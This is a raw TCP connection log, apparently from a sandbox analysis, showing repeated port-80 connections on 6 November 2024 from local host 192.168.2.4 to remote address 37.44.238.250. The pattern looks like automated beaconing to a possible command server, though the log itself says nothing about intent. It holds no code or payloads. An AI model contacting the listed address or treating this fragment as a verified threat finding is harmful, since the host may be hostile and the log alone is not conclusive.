                                                                    Nov 6, 2024 03:38:31.075959921 CET804996337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.076179028 CET4996380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.077763081 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.077848911 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.077939034 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.082912922 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.422900915 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.427680969 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.884031057 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:31.953850985 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:31.959028006 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.073879004 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.074634075 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.078876019 CET804996937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.078929901 CET4996980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.079400063 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.079471111 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.079571962 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.084263086 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.438370943 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.443367958 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.884814978 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:32.953840017 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:32.965516090 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.125905991 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.574598074 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.575001955 CET4998480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.579783916 CET804997737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.579842091 CET4997780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.579849958 CET804998437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.583431005 CET4998480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.583528996 CET4998480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.584561110 CET4998580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.588299990 CET804998437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.589512110 CET804998537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.589608908 CET4998580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.589720964 CET4998580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.594465971 CET804998537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.938370943 CET4998480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.938455105 CET4998580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:33.943310022 CET804998437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.943331957 CET804998537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:33.943342924 CET804998537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.392713070 CET804998437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.411118031 CET804998537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.453834057 CET4998580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.453834057 CET4998480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.468540907 CET804998437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.469124079 CET4998580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.474317074 CET804998537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.474385023 CET4998580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.595778942 CET4998480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.596515894 CET4999180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.600976944 CET804998437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.601073980 CET4998480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.601373911 CET804999137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.601448059 CET4999180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.601540089 CET4999180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.606246948 CET804999137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:34.953922033 CET4999180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:34.958717108 CET804999137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:35.410927057 CET804999137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:35.453927994 CET4999180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:35.487087011 CET804999137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:35.531974077 CET4999180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:35.603841066 CET4999180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:35.608268976 CET4999980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:35.613176107 CET804999937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:35.615391970 CET4999980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:35.615499973 CET4999980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:35.620417118 CET804999937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:35.969608068 CET4999980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:36.146950960 CET804999937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:36.544732094 CET804999937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:36.545187950 CET804999937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:36.545218945 CET804999937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:36.545270920 CET4999980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:36.672354937 CET4999980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:36.674566031 CET5000380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:36.751013994 CET805000337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:36.751085043 CET5000380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:36.751256943 CET5000380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:36.754559994 CET804999937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:36.754714966 CET4999980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:36.759268999 CET805000337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:37.110300064 CET5000380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:37.115267038 CET805000337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:37.566184044 CET805000337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:37.640352964 CET805000337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:37.640413046 CET5000380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:37.844109058 CET5000380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:37.849186897 CET805000337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:37.849241018 CET5000380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:37.868455887 CET5000980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:37.873226881 CET805000937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:37.873289108 CET5000980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:37.873390913 CET5000980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:37.878093004 CET805000937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:38.219842911 CET5000980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:38.224688053 CET805000937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:38.675180912 CET805000937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:38.750847101 CET805000937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:38.750935078 CET5000980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.261507034 CET5000980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.262844086 CET5001980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.266810894 CET805000937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.266859055 CET5000980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.267657995 CET805001937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.267724991 CET5001980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.267858028 CET5001980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.272634029 CET805001937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.485820055 CET5001980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.486841917 CET5002180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.491677046 CET805002137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.491744995 CET5002180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.491946936 CET5002180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.496746063 CET805002137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.537672043 CET805001937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.604887962 CET5002280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.609677076 CET805002237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.609740973 CET5002280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.609935045 CET5002280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.614665031 CET805002237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.844563961 CET5002180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.849397898 CET805002137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.849469900 CET805002137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.855350971 CET805001937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:39.855396032 CET5001980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.953953981 CET5002280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:39.958745003 CET805002237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.302485943 CET805002137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.374916077 CET805002137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.374974012 CET5002180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.419034958 CET805002237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.495553017 CET805002237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.495609999 CET5002280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.620214939 CET5002180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.620292902 CET5002280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.621032953 CET5002880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.625339031 CET805002137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.625788927 CET805002837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.625817060 CET5002180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.625859022 CET5002880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.625998974 CET5002880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.626108885 CET805002237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.626151085 CET5002280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:40.630744934 CET805002837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:40.985196114 CET5002880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:41.041049957 CET805002837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:41.439735889 CET805002837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:41.516890049 CET805002837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:41.519435883 CET5002880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:41.912719965 CET5002880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:41.913463116 CET5003480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:41.917918921 CET805002837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:41.918267965 CET805003437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:41.918339014 CET5002880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:41.918380976 CET5003480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:41.918498993 CET5003480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:41.923213005 CET805003437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:42.266490936 CET5003480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:38:42.271389008 CET805003437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:38:42.731484890 CET805003437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.382741928 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.382811069 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.382942915 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.387785912 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.414822102 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.420025110 CET805012037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.420139074 CET5012080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.703012943 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.707863092 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.707933903 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.708014965 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.712754011 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.735289097 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:02.740103960 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:02.740328074 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.063471079 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.068334103 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.224968910 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.300338030 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.300406933 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.518095016 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.585042000 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.585120916 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.700020075 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.700258970 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.700881958 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705123901 CET805012137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.705188990 CET5012180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705405951 CET805012237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.705473900 CET5012280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705813885 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:03.705869913 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.705976009 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:03.710701942 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.063492060 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.068416119 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.524857998 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.614190102 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.615442038 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.731197119 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.731519938 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.736303091 CET805012337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.736450911 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:04.736515999 CET5012380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.736552954 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.736673117 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:04.741374016 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.094713926 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.099798918 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.554753065 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.630374908 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.630460978 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.747819901 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.748272896 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.753021002 CET805012437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.753084898 CET5012480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.753113031 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:05.753184080 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.753454924 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:05.758219957 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.110245943 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.115228891 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.572362900 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.625741005 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.645905018 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.735114098 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.761941910 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.762300014 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.767002106 CET805012537.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.767160892 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:06.767231941 CET5012580192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.767270088 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.767365932 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:06.772072077 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.125850916 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.130778074 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.585681915 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.664144993 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.664216995 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.776114941 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.776618004 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.781411886 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.781498909 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.781579971 CET805012637.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:07.781639099 CET5012680192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.781730890 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:07.803522110 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.125845909 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.131736994 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.314459085 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.314662933 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.319505930 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.323462963 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.323539972 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.328278065 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.361561060 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.376992941 CET805012737.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.377048016 CET5012780192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.433947086 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.438812017 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.441555977 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.441555977 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.446394920 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.672713041 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.679461002 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.681118965 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:08.797709942 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:08.802552938 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.165200949 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.219511986 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.242007017 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.245186090 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.282010078 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.320733070 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.320785046 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.500834942 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.500839949 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.506275892 CET805012937.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.506344080 CET5012980192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.506418943 CET805012837.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.506459951 CET5012880192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.535504103 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.540296078 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.540376902 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.540478945 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.545202971 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:09.891505957 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:09.896358013 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.352097988 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.428319931 CET805013037.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.428401947 CET5013080192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.553035975 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.557861090 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.557969093 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.558006048 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.562741995 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:10.907097101 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:10.911919117 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.376306057 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.422625065 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.453664064 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.500750065 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.575330973 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.576260090 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.580634117 CET805013137.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.580693960 CET5013180192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.581198931 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.581259012 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.581404924 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.586162090 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:11.938318014 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:11.943280935 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.392910957 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.438261986 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.473086119 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.589561939 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.589999914 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.594908953 CET805013237.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.594921112 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.594966888 CET5013280192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.595002890 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.595108986 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.599822044 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:12.953946114 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:12.958966017 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.404814005 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.476664066 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.476726055 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.595357895 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.596512079 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.600601912 CET805013337.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.600651979 CET5013380192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.601375103 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.601427078 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.601519108 CET5013480192.168.2.437.44.238.250
                                                                    Nov 6, 2024 03:39:13.606431961 CET805013437.44.238.250192.168.2.4
                                                                    Nov 6, 2024 03:39:13.953950882 CET5013480192.168.2.437.44.238.250
